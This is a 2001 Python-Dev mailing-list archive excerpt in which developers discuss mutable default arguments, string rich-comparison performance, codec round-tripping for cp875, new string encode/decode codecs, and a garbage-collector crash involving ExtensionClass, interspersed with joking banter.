Regards, Martin From larsga at garshol.priv.no Wed May 16 10:19:10 2001 From: larsga at garshol.priv.no (Lars Marius Garshol) Date: 16 May 2001 10:19:10 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il> References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: * Idan Sofer | | If a class has an argument with a default of an empty dictionary, | then all instances of the same class will point to the same | dictionary, unless the dictionary is explicitly defined by the | constructor. This is part of the language semantics, and so not a bug. The default values of optional arguments are evaluated when the function/method is compiled. You may consider the semantics ill-advised, but it is intentional.

| class foo:
|
|     def __init__(self,attribs={}):
|         self.attribs=attribs;
|         return None;

I usually write this as:

class Foo:
    def __init__(self, attribs = None):
        self.attribs = attribs or {}

--Lars M. From fredrik at pythonware.com Wed May 16 10:18:44 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 16 May 2001 10:18:44 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff> Idan Sofer wrote: > > I have found a rather annoying bug in Python, present in both Python 1.5 > and Python 2.0. > > If a class has an argument with a default of an empty dictionary, then > all instances of the same class will point to the same dictionary, > unless the dictionary is explicitly defined by the constructor. maybe you should check the documentation (or the FAQ) before submitting bugs? http://www.python.org/doc/current/ref/function.html Default parameter values are evaluated when the function definition is executed.
This means that the expression is evaluated once, when the function is defined, and that that same ``pre- computed'' value is used for each call. This is especially important to understand when a default parameter is a mutable object, such as a list or a dictionary: if the function modifies the object (e.g. by appending an item to a list), the default value is in effect modified. Cheers /F PS. when you do report real bugs, please use the bug tracker: http://sourceforge.net/tracker/?group_id=5470&atid=105470 "is this a bug" questions should be sent to comp.lang.python From tim.one at home.com Wed May 16 10:41:47 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:41:47 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: [Martin] > Producing numbers is easy :-) If only making sense of them were too <0.6 wink>. > I've instrumented my version where string implements richcmp, and > special-cases everything I can think of. 1. String objects are also equal despite being different objects, if their ob_sinterned pointers are equal and non-NULL. So if you're looking for every trick in & out of the book, that's another one. 2. But the real goal is to add only those special cases that in combination yield the largest net win, and that's much harder to determine (since there are no typical apps, and it's very hard to quantify the tradeoffs here in a credible x-platform x-app way). > Counting is done for running the test suite. With this, I get > > Calls to string_richcompare: 2378660 > Calls with different types: 33992 (ie. one is not a string) > Calls with identical strings: 120517 > Calls where lens decide !EQ: 1775716 > ---------------------------- > Calls richcmp -> oldcomp: 448435 > Total calls to oldcomp: 1225643 > Calls oldcomp -> memcmp: 860174 > > So 5% of the calls are with identical strings, for which I can > immediately decide the outcome. 
But also at the cost of doing a fruitless compare and branch in 95% of calls. There isn't enough data to guess whether this is a net win or a net loss (compared to leaving this special case out). Note that if the "identical string pointers" special case is a net win, it would be effective inside oldcomp instead (i.e., you don't need a richcompare slot to exploit it); indeed, it may be more effective there, since there are some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp doesn't check for pointer equality now (but PyObject_Compare does, so there didn't *used* to be any point to it in oldcmp). Any idea where those 800,000 virgin calls to oldcomp are coming from? That's a lot. > 75% can be decided in terms of the string lengths, which leaves ca. 19% > for cases where lexicographical comparison is needed. So about 1 in 5 times there's also the additional (wrt just calling oldcmp all the time) overhead of a second function call (i.e., the call to oldcmp made by richcmp). > In those cases, the first byte decides in 30%. If I remove the test > for "len decides !EQ", I get > > #riches: 2358322 > #riches_ni: 34108 > #idents_decide: 102050 > #lens_decide: 0 > -------------------------------------- > rest(computed): 2222164 > #comps: 2949421 > #memcmps: 917776 > > So still, ca. 30% can be decided by first byte. Sorry, I couldn't follow this part, except noting that 917776 is about 30% of 2949421, in which case I would have expected you to say that 70% can be decided by first byte. > It still appears that the total number of calls to memcmp is higher > when the length is not taken into consideration. Since 917776 is larger than the earlier 860174, isn't that plain? BTW, some compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of course assuming it *isn't* is also a x-platform trap. 
> To verify this claim, I've counted the cases where the length > decides the outcome, but looking at the first byte also had: > > lens_decide: 1784897 > lens_decide_firstbyte_wouldhave:1671148 > > So in 6% of the cases, checking the length alone gives a decision > which looking at the first byte doesn't; plus it saves a function > call. OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net* effect is muddy at best. > To support the thesis that Py_EQ is the common case for strings, I > counted the various operations: > > pyEQ:2271593 > pyLE:9234 > pyGE:0 > pyNE:20470 > pyLT:22765 > pyGT:578 This clearly wasn't doing much sorting of strings (or of tuples containing strings, etc) -- .sort() never uses pyEQ (it only uses pyLT). > Now, that might be flawed since comparing strings for equal is > extremely frequent in the testsuite. To give more credibility to the > data, I also ran setup.py with my instrumented ./python: In the absence of non-trivial use of sorting or the bisect module or one of the search tree modules out there, it's easy to buy that PyEQ is most common for strings. What's not clear is that adding a rich comparison slot actually helps overall (as compared to continuing to let string_compare() handle it, and if the pointer equality test actually saves more than it costs, adding it there instead). It's clearer that this is going to hurt sorting (& bisect etc), by adding yet another layer of function call to get Py_LT resolved (as for dict compares too, the string richcmp can't do anything to speed up Py_LT that string oldcmp can't do just as efficiently -- indeed, that's the great advantage oldcmp's "compare first character" test had: that *can* decide Py_LT in one byte much of the time (but length comparison cannot)). 
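The trade-off being weighed here is the order of cheap tests inside a string comparison. A Python 3 model (not CPython's C code; `string_eq` and `string_lt` are illustrative names) that reports which test settled each answer shows the asymmetry: identity and length can settle `==`, but only a first-byte probe can settle `<` early.

```python
def string_eq(a: bytes, b: bytes):
    """Return (a == b, name of the test that decided it), cheapest test first."""
    if a is b:
        return True, "identity"       # same object: equal without reading data
    if len(a) != len(b):
        return False, "length"        # different lengths can never be equal
    if a[:1] != b[:1]:
        return False, "first byte"    # one-byte probe before the full scan
    return a == b, "full compare"     # stands in for memcmp()


def string_lt(a: bytes, b: bytes):
    """Return (a < b, deciding test); a length test cannot decide <."""
    if a[:1] != b[:1]:
        return a[:1] < b[:1], "first byte"
    return a < b, "full compare"


s = b"spam"
print(string_eq(s, s))              # (True, 'identity')
print(string_eq(b"spam", b"spa"))   # (False, 'length')
print(string_eq(b"spam", b"xpam"))  # (False, 'first byte')
print(string_lt(b"abc", b"xbc"))    # (True, 'first byte')
```

Each early test costs a compare and branch on every call where it does not fire, which is exactly the cost Tim asks to be weighed against the calls it saves.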
Note too earlier mail about how adding a richcmp slot to strings will suddenly slow cmp(string1, string2) (which is the usual way to program a search tree, because cmp() *used* to call a string comparison routine only once; but after adding a richcmp slot, each cmp(string1, string2) will call the richcmp slot from 1 thru 3 times (data-dependent)). > ... > That shows that optimizing for Py_NE is not worth it. With these data, > I'll upload a patch to SF. Which is here: http://sourceforge.net/tracker/index.php?func=detail&aid=424335&group_id=5470&atid=305470 Heh: let's grab all the ugly URLs off of SourceForge, stick them in a giant list, and sort them. Can't think of a more typical app than that. Thanks for the work, Martin! From tim.one at home.com Wed May 16 10:51:17 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:51:17 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: [Barry A. Warsaw]
> ...
> from types import StringType
> import time
> r = range(1000000)
>
> def one(r=r):
>     x = 'hello'
>     t0 = time.time()
>     for i in r:

Random clue: when you're too lazy to try to subtract out loop overhead (not a knock, I am too), you may have better luck with

    r = [1] * 1000000

than

    r = range(1000000)

The reason is that the former way gets to keep incref'ing and decref'ing a single object (as it's repeatedly bound to "i" across iterations), instead of slobbering all over memory inc'ing and dec'ing a million distinct objects. there's-as-an-art-to-doing-nothing-quickly-ly y'rs - tim From tim.one at home.com Wed May 16 10:56:56 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> Message-ID: [poor Tim] > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ [Greg Ewing] > What Pythonistas wear on their feet? [Eric S. Raymond] > No, man.
It's what sexy lady Pythonistas wear on the beach in Rio. Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked what a lon was. But not as surprised that I didn't try to blame this on an Outlook 2000 bug. > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) Too much work anyway. They can have mine: 703 758 8258. but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs - tim From esr at thyrsus.com Wed May 16 11:17:09 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 16 May 2001 05:17:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400 References: <20010515222738.A9996@thyrsus.com> Message-ID: <20010516051709.C11602@thyrsus.com> Tim Peters : > [poor Tim] > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > [Greg Ewing] > > What Pythonistas wear on their feet? > > [Eric S. Raymond] > > No, man. It's what sexy lady Pythonistas wear on the beach in Rio. > > Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked > what a lon was. But not as surprised that I didn't try to blame this on an > Outlook 2000 bug. > > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > > phone numbers. Pthfthfthpht...) > > Too much work anyway. They can have mine: 703 758 8258. Hmmm...now, which one of them should I try to talk into a snakeskin bikini? Duh. Answer obvious: the one I can talk *out* of a snakeskin bikini most rapidly afterwards. Then I'll give her your number -- that is, if I don't get too, er, distracted. seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours, -- Eric S. Raymond Every Communist must grasp the truth, 'Political power grows out of the barrel of a gun.' -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment. From mal at lemburg.com Wed May 16 11:29:49 2001 From: mal at lemburg.com (M.-A.
Lemburg) Date: Wed, 16 May 2001 11:29:49 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B02488D.415BA95F@lemburg.com> Tim Peters wrote: > > [MAL] > > Round-tripping is obviously very important if you use Unicode > > as basis for working on text. > > Since I use 7-bit ASCII exclusively, I've been using
>
>     encode = decode = lambda x: x
>
> I haven't proved that's round-trippable, but haven't bumped into an exception > yet. For character map codecs the complete range(256) of possible input characters should pass the round-trip test, that is encoded text -> Unicode -> encoded text should result in the identity mapping for all c in map(chr,range(256)). > > I don't know about the reasoning behind making cp875 fail the > > round-trip -- Unicode certainly provides means to make mappings > > round-trip safe (e.g. by reverting to the private Unicode > > char. point areas). > > Then I ignorantly but confidently (indeed, with the cheery confidence only > the truly ignorant can truly enjoy!) vote for your approach that maps the > non-round-trippable cp875 code points to None. Better safe than sorry, by > default. Else 6 of the 7 ambiguous chars will be silent surprises by > default. I will check in a patch which moves the building logic for encoding maps to codecs.py. This will simplify the task of choosing the "right" solution. Currently I'm in favour of:

def make_encoding_map(decoding_map):

    """ Creates an encoding map from a decoding map.

        If a target mapping in the decoding map occurs multiple
        times, then that target is mapped to None (undefined mapping),
        causing an exception when encountered by the charmap codec
        during translation.

        One example where this happens is cp875.py which decodes
        multiple characters to \u001a.

    """
    m = {}
    for k,v in decoding_map.items():
        if not m.has_key(v):
            m[v] = k
        else:
            m[v] = None
    return m

Perhaps we should also have a codecs.finalize_decoding_map() API in codecs.py which checks the decoding map and postprocesses it in case it finds a problem ?! -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 16 11:32:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:32:36 +0200 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> Message-ID: <3B024934.58232325@lemburg.com> "Martin v. Loewis" wrote: > > > Sounds like we ought to do a search-and-destroy on type comparisons, > > replacing with isinstance() where possible. > > At least in my applications, this is unfortunately not possible: I > want a test for byte-string-or-unicode-string. This could be done with > two isinstance calls, but that is certainly less efficient. > > Marc-Andre once proposed a type representing the immediate supertype > of both byte strings and unicode strings; let's call it abstract string. > Then I could write isinstance(e, types.AbstractString). I'm still holding on to that idea... hopefully, Guido's type checkins will make this possible in 2.2 or 2.3. The same should then be done for numbers, sequences and mappings (all abstract "types" defined in abstract.c). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 16 11:34:40 2001 From: mal at lemburg.com (M.-A.
Lemburg) Date: Wed, 16 May 2001 11:34:40 +0200 Subject: [Python-Dev] Comparison speed References: Message-ID: <3B0249B0.5DD10A4C@lemburg.com> Tim Peters wrote: > > [Martin] > > Producing numbers is easy :-) > > If only making sense of them were too <0.6 wink>. FYI, I've added a few compare tests to pybench which now is available as version 0.9. You can download it from my Python page. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Wed May 16 12:53:16 2001 From: mwh at python.net (Michael Hudson) Date: 16 May 2001 11:53:16 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: Guido van Rossum writes: > > I've just checked in a set of patches which implement the new > > .decode() method along with a couple of useful codecs. > > Cool! Indeed. Good idea, Marc! This is a bit unfriendly though:

>>> "bobbins".encode("gzip")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.gzip" failed to register

I thought SystemErrors shouldn't ever happen (isn't it what gets raised for an illegal opcode, for example?). > > To see just how easy it is to write codecs, please have > > a look at the string codecs I added in this patch (e.g. > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > are a lot more useful things in the standard lib which could > > benefit from these easy-to-use interfaces. > > As an exercise, I added a quoted-printable codec. It was easy > indeed! urlencode would be nice. Maybe re.escape, too. html entities? That's probably a bigger can of worms, but print "

%s

"%text.encode("html") seems delightfully simpleminded. Cheers, M. -- GAG: I think this is perfectly normal behaviour for a Vogon. ... VOGON: That is exactly what you always say. GAG: Well, I think that is probably perfectly normal behaviour for a psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9 From mal at lemburg.com Wed May 16 13:06:14 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 13:06:14 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: <3B025F26.A625DE02@lemburg.com> Michael Hudson wrote: > > Guido van Rossum writes: > > > > I've just checked in a set of patches which implement the new > > > .decode() method along with a couple of useful codecs. > > > > Cool! > > Indeed. Good idea, Marc! Thanks :-) > This is a bit unfriendly though: > > >>> "bobbins".encode("gzip") > Traceback (most recent call last): > File "", line 1, in ? > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > raise SystemError,\ > SystemError: module "encodings.gzip" failed to register > > I thought SystemErrors shouldn't ever happen (isn't it what gets > raised for an illegal opcode, for example?). This is due to the zlib module not being installed. The reason for the search function in encodings/__init__.py raising a SystemError is that it did find a module named gzip, but this module does not export the needed registration API getregentry(). Perhaps it should just raise a LookupError instead, though... > > > To see just how easy it is to write codecs, please have > > > a look at the string codecs I added in this patch (e.g. > > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > > are a lot more useful things in the standard lib which could > > > benefit from these easy-to-use interfaces. > > > > As an excercise, I added a quoted-printable codec. It was easy > > indeed! 
> 
> urlencode would be nice.  Maybe re.escape, too.  html entities?
> That's probably a bigger can of worms, but
> 
> print "%s"%text.encode("html")
> 
> seems delightfully simpleminded.

Right. That's the idea... volunteers are welcome :-)

There are lots of those little "escape this, encode that" tasks
which could benefit from the codec machinery. The ones you
mention would certainly be good candidates. pickle and marshal
would also be good to have wrapped as codecs.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/

From mwh at python.net  Wed May 16 13:19:15 2001
From: mwh at python.net (Michael Hudson)
Date: 16 May 2001 12:19:15 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com>
Message-ID:

"M.-A. Lemburg" writes:

> > This is a bit unfriendly though:
> > 
> > >>> "bobbins".encode("gzip")
> > Traceback (most recent call last):
> >   File "<stdin>", line 1, in ?
> >   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
> >     raise SystemError,\
> > SystemError: module "encodings.gzip" failed to register
> > 
> > I thought SystemErrors shouldn't ever happen (isn't it what gets
> > raised for an illegal opcode, for example?).
> 
> This is due to the zlib module not being installed.

No it's not, actually.  I *thought* I was getting the error message
because the zlib encoding doesn't alias itself to gzip (whether it
should or not is another question).  But in fact if you specify a
bogus encoding you get a nice error message:

>>> "bobbins".encode("nonesuch")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
LookupError: unknown encoding

but:

>>> "bobbins".encode("sys")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.sys" failed to register

I have to admit I don't really know what's going on here, but the
error is just confusing.

> The reason for the search function in encodings/__init__.py raising
> a SystemError is that it did find a module named gzip, but this
> module does not export the needed registration API getregentry().

Yep.

> Perhaps it should just raise a LookupError instead, though...

Might be easiest.

> > urlencode would be nice.  Maybe re.escape, too.  html entities?
> > That's probably a bigger can of worms, but
> > 
> > print "%s"%text.encode("html")
> > 
> > seems delightfully simpleminded.
> 
> Right. That's the idea... volunteers are welcome :-)

Maybe this evening.

> There are lots of those little "escape this, encode that" tasks
> which could benefit from the codec machinery. The ones you
> mention would certainly be good candidates. pickle and marshal
> would also be good to have wrapped as codecs.

Ooh yes, hadn't thought of them.

'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs
M.

-- 
  There's an aura of unholy black magic about CLISP.  It works, but
  I have no idea how it does it.  I suspect there's a goat involved
  somewhere.                     -- Johann Hibschman, comp.lang.scheme

From aahz at rahul.net  Wed May 16 15:16:18 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 16 May 2001 06:16:18 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM
Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net>

Eric S. Raymond wrote:
> 
> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

That's okay, I have their e-mail addresses.  Wanna bet on which of us
gets a response first?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.

From barry at digicool.com  Wed May 16 15:42:15 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 16 May 2001 09:42:15 -0400
Subject: [Python-Dev] Comparison speed
References: <15105.46090.203278.397835@anthem.wooz.org>
Message-ID: <15106.33719.14403.13051@anthem.wooz.org>

>>>>> "TP" == Tim Peters writes:

    TP> Random clue: when you're too lazy to try to subtract out loop
    TP> overhead (not a knock, I am too), you may have better luck
    TP> with

    TP>     r = [1] * 1000000

    TP> than

    TP>     r = range(1000000)

Ah, good point!
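The codec ideas in the "Easy codec access" messages above carry over to modern Python 3. What follows is a minimal sketch, not the 2001 API. Python 3 reaches bytes-to-bytes codecs such as zlib, hex and base64 through codecs.encode() and codecs.decode() rather than str.encode()/.decode(). The "html" codec is hypothetical, since nothing by that name ships with Python. It is registered with codecs.register() and built on html.escape() and html.unescape(). Its search function returns None for names it does not recognise, so an unknown encoding ends in a LookupError rather than the confusing SystemError Michael ran into.

```python
import codecs
import html

# Bytes-to-bytes codecs that ship with Python 3: reached via codecs.encode()/decode().
packed = codecs.encode(b"bobbins", "zlib")
assert codecs.decode(packed, "zlib") == b"bobbins"
hexed = codecs.encode(b"abc", "hex")
signoff = codecs.decode(b"YW5vdGhlci1mdW4tdG95\n", "base64")


# Hypothetical "html" codec (str in, str out), built on the html module.
def _html_encode(text, errors="strict"):
    # Codec functions return (output, number of input characters consumed).
    return html.escape(text), len(text)


def _html_decode(text, errors="strict"):
    return html.unescape(text), len(text)


def _search(name):
    # Returning None for names we don't handle lets the registry keep
    # looking and finally raise LookupError for unknown encodings.
    if name == "html":
        return codecs.CodecInfo(_html_encode, _html_decode, name="html")
    return None


codecs.register(_search)

escaped = codecs.encode("<pre>Tom & Jerry</pre>", "html")
print(hexed)    # b'616263'
print(signoff)  # b'another-fun-toy'
print(escaped)  # &lt;pre&gt;Tom &amp; Jerry&lt;/pre&gt;

try:
    codecs.encode(b"bobbins", "nonesuch")
except LookupError as exc:
    print("LookupError:", exc)
```

Use codecs.encode() for the str-to-str codec. str.encode() insists on a bytes result, so it would reject this codec's output.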
From guido at digicool.com  Wed May 16 17:01:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:01:40 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200." <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com>

> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

This will probably be doable in 2.2.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From guido at digicool.com  Wed May 16 17:24:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:24:55 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400."
References:
Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>

> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

Unclear what you're asking.  The language doesn't require any
particular semantics for sequence comparisons, but the language of
course includes the tuple and list sequence types, and it describes
(albeit lacking some rigorous detail) what comparisons for those do.
If there are specific lacks of detail, it probably helps to think
about filling those in.

> For a more vanilla example, I removed the EQ/NE "lengths differ?"
> tuple richcmp early-exit test because I never found code that made
> it trigger (but tons of code that gets there without triggering).
> But this has semantic implications too:  an implementation without
> the early exit may call user-defined comparison routines that raise
> exceptions when comparing tuples of different lengths now.  Do you
> care?  (I don't.)

I don't care about exceptions either in this case; the shortcut seems
fair game.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From skip at pobox.com  Wed May 16 16:28:04 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 09:28:04 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B025F26.A625DE02@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com>
Message-ID: <15106.36468.62292.611515@beluga.mojam.com>

    mal> pickle and marshal would also be good to have wrapped as codecs.

Why?  They operate on much more than strings.

-- 
Skip Montanaro (skip at pobox.com)
(847)971-7098

From fredrik at effbot.org  Wed May 16 17:07:18 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 16 May 2001 17:07:18 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com>
Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid>

skip wrote:

>     mal> pickle and marshal would also be good to have wrapped as codecs.
> 
> Why?  They operate on much more than strings.

hypergeneralization, of course.
more candidates:

    "10".decode("int")
    "10.0".decode("float")
    "[1, 2, 3]".decode("list")
    "readme.txt".decode("file")
    "SyntaxError".decode("raise")
    (etc)

Cheers /F

From nas at python.ca  Wed May 16 18:19:42 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 16 May 2001 09:19:42 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
Message-ID: <20010516091942.A16455@glacier.fnational.com>

Martin v. Loewis wrote:
> In any case, I think you need to analyse this in a debugger.

#7  0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 , arg=0x0)
    at ../Objects/tupleobject.c:366
366                     err = visit(x, arg);
(gdb) p *o
$11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}}
(gdb) p *o->ob_item[0]
$12 = {ob_refcnt = 2, ob_type = 0x0}

In other words the GC is finding a tuple object that contains an
element with a funny looking address (data segment?) and an
ob_type of NULL.
The collector has started running from here:

#10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467
#11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507
#12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149
#13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249
#14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495
#15 0x08095fb1 in export_subclassed_type (dict=0x81851fc,
    name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451
#16 0x400194ac in pygobject_register_class (dict=0x81851fc,
    class_name=0x402a9388 "GdkDragContext", get_type=0x404d5c50 ,
    ec=0x402bcc40, bases=0x816fc34) at gobjectmodule.c:202
#17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844
#18 0x40257004 in init_gtk () at gtkmodule.c:98

I don't have time to dig deeper into this right now but perhaps this
will help someone.

  Neil

From mal at lemburg.com  Wed May 16 18:24:57 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 18:24:57 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid>
Message-ID: <3B02A9D9.113836D6@lemburg.com>

Fredrik Lundh wrote:
> 
> skip wrote:
> 
> >     mal> pickle and marshal would also be good to have wrapped as codecs.
> > 
> > Why?  They operate on much more than strings.

Of course. Still their basic task is to take an object and encode
it in some way for dumps() and do the reverse for loads().
That's pretty much what codecs normally do ;-)

I wasn't referring to the use of pickle and marshal with string.encode()
and .decode(); even though you could then decode a pickle using
"pickledata".decode("pickle") and get back the object.

These two are very useful though when it comes to using codecs
for file wrappers:

f = codecs.open('mypicklfile', mode='wb', encoding='pickle')
f.write((123, 'abc', 456.789))
f.close()

f = codecs.open('mypicklfile', mode='rb', encoding='pickle')
t = f.read()
f.close()

> hypergeneralization, of course.
> 
> more candidates:
> 
>     "10".decode("int")
>     "10.0".decode("float")
>     "[1, 2, 3]".decode("list")
>     "readme.txt".decode("file")
>     "SyntaxError".decode("raise")
>     (etc)

You forgot the most important one ;-) ...

"print 'My first Python program'".decode("python").run()

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/

From skip at pobox.com  Wed May 16 19:44:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 12:44:15 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> <3B02A9D9.113836D6@lemburg.com>
Message-ID: <15106.48239.813965.579600@beluga.mojam.com>

    mal> Still their basic task is to take an object and encode it in some
    mal> way for dumps() and do the reverse for loads().  That's pretty
    mal> much what codecs normally do ;-)

